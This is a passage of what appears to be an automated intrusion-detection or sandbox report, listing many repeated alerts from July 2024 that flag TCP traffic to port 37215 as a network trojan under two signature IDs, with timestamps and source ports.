                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565192
                  SID:2829579
                  Source Port:44774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2835222
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2829579
                  Source Port:47820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.197081
                  SID:2829579
                  Source Port:38634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2829579
                  Source Port:35158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.145286
                  SID:2829579
                  Source Port:58190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.300149
                  SID:2829579
                  Source Port:52928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336820
                  SID:2829579
                  Source Port:50662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2829579
                  Source Port:59342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741925
                  SID:2829579
                  Source Port:59732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.421240
                  SID:2829579
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.477635
                  SID:2835222
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013030
                  SID:2835222
                  Source Port:35692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958121
                  SID:2835222
                  Source Port:36598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841865
                  SID:2829579
                  Source Port:53768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2835222
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996169
                  SID:2829579
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418573
                  SID:2829579
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641053
                  SID:2829579
                  Source Port:44422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.882583
                  SID:2835222
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2835222
                  Source Port:41006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970396
                  SID:2829579
                  Source Port:41758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.800404
                  SID:2829579
                  Source Port:35216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2829579
                  Source Port:45496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2835222
                  Source Port:53282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290742
                  SID:2835222
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372351
                  SID:2829579
                  Source Port:45976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069445
                  SID:2829579
                  Source Port:56634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.758583
                  SID:2829579
                  Source Port:41216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2829579
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.288154
                  SID:2835222
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390012
                  SID:2829579
                  Source Port:39152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.931040
                  SID:2829579
                  Source Port:42808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2835222
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409716
                  SID:2835222
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200301
                  SID:2835222
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2835222
                  Source Port:34146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395055
                  SID:2829579
                  Source Port:46356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2835222
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2829579
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2829579
                  Source Port:43952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2829579
                  Source Port:39746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254680
                  SID:2835222
                  Source Port:52940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2835222
                  Source Port:43798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290152
                  SID:2835222
                  Source Port:41016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.324880
                  SID:2829579
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.400738
                  SID:2829579
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054503
                  SID:2829579
                  Source Port:35514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988498
                  SID:2835222
                  Source Port:58218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.139115
                  SID:2829579
                  Source Port:58796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.062552
                  SID:2835222
                  Source Port:34066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.076787
                  SID:2829579
                  Source Port:48686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.563239
                  SID:2829579
                  Source Port:46116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.164595
                  SID:2829579
                  Source Port:46580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.445114
                  SID:2829579
                  Source Port:42494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.767297
                  SID:2835222
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2829579
                  Source Port:60694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933243
                  SID:2835222
                  Source Port:46064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595154
                  SID:2829579
                  Source Port:42234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305980
                  SID:2829579
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2835222
                  Source Port:60336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2829579
                  Source Port:42480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.083011
                  SID:2829579
                  Source Port:44686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:46662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.684788
                  SID:2829579
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985510
                  SID:2835222
                  Source Port:52880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2835222
                  Source Port:47612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430754
                  SID:2835222
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2835222
                  Source Port:45386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2829579
                  Source Port:34910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2835222
                  Source Port:56044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.731752
                  SID:2835222
                  Source Port:59418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
                  SID:2829579
                  Source Port:35166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2835222
                  Source Port:33554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2835222
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2835222
                  Source Port:36392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2835222
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.121414
                  SID:2829579
                  Source Port:57976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2829579
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983533
                  SID:2835222
                  Source Port:35270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.521266
                  SID:2835222
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.818070
                  SID:2829579
                  Source Port:40452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2829579
                  Source Port:54860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2835222
                  Source Port:44636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2829579
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2829579
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2835222
                  Source Port:42252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2829579
                  Source Port:38436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.672792
                  SID:2829579
                  Source Port:37552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894192
                  SID:2829579
                  Source Port:33234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2829579
                  Source Port:51754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453618
                  SID:2829579
                  Source Port:43284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:46244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2829579
                  Source Port:41428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.769686
                  SID:2829579
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.164158
                  SID:2835222
                  Source Port:55166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249183
                  SID:2835222
                  Source Port:56884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2835222
                  Source Port:43348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.164570
                  SID:2829579
                  Source Port:53966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240968
                  SID:2835222
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983854
                  SID:2829579
                  Source Port:52146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.514573
                  SID:2835222
                  Source Port:33380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593269
                  SID:2835222
                  Source Port:42990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201390
                  SID:2835222
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.960841
                  SID:2835222
                  Source Port:42446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2835222
                  Source Port:35772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:55048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:38902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2829579
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.519262
                  SID:2835222
                  Source Port:59704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.076787
                  SID:2829579
                  Source Port:59584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2829579
                  Source Port:50280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.959162
                  SID:2829579
                  Source Port:44654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2835222
                  Source Port:40108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2829579
                  Source Port:35238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2829579
                  Source Port:44054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2829579
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453748
                  SID:2835222
                  Source Port:59032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.889378
                  SID:2829579
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2835222
                  Source Port:35552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2829579
                  Source Port:50300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.851748
                  SID:2829579
                  Source Port:33138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2829579
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2835222
                  Source Port:37162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2835222
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2829579
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:60292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.391743
                  SID:2829579
                  Source Port:41048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2829579
                  Source Port:56032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2835222
                  Source Port:43920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2835222
                  Source Port:39290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594914
                  SID:2835222
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2835222
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.237308
                  SID:2835222
                  Source Port:59614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336924
                  SID:2829579
                  Source Port:50202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859169
                  SID:2829579
                  Source Port:38632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.894621
                  SID:2835222
                  Source Port:59818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.043908
                  SID:2829579
                  Source Port:49246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969941
                  SID:2835222
                  Source Port:57724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767213
                  SID:2835222
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563022
                  SID:2835222
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:52492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639186
                  SID:2829579
                  Source Port:36238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2835222
                  Source Port:46968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072939
                  SID:2829579
                  Source Port:50646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2829579
                  Source Port:36848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2835222
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.230716
                  SID:2829579
                  Source Port:33896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.706430
                  SID:2835222
                  Source Port:33484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164173
                  SID:2829579
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385644
                  SID:2835222
                  Source Port:58644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755874
                  SID:2835222
                  Source Port:49408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.086105
                  SID:2829579
                  Source Port:38458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468690
                  SID:2835222
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933243
                  SID:2829579
                  Source Port:47296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2829579
                  Source Port:48316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2829579
                  Source Port:44986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2835222
                  Source Port:46250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2835222
                  Source Port:58194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.807030
                  SID:2829579
                  Source Port:43886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868554
                  SID:2835222
                  Source Port:36320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548676
                  SID:2829579
                  Source Port:58996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607530
                  SID:2829579
                  Source Port:32794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2835222
                  Source Port:41918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:51196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755062
                  SID:2829579
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809601
                  SID:2835222
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2835222
                  Source Port:40808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2835222
                  Source Port:35858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.544401
                  SID:2835222
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.319279
                  SID:2835222
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746677
                  SID:2835222
                  Source Port:40950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2835222
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.890677
                  SID:2835222
                  Source Port:60042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2829579
                  Source Port:38054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956577
                  SID:2829579
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2829579
                  Source Port:51288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2829579
                  Source Port:56610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008673
                  SID:2835222
                  Source Port:48148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457680
                  SID:2829579
                  Source Port:38584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.610016
                  SID:2835222
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.353960
                  SID:2829579
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877768
                  SID:2835222
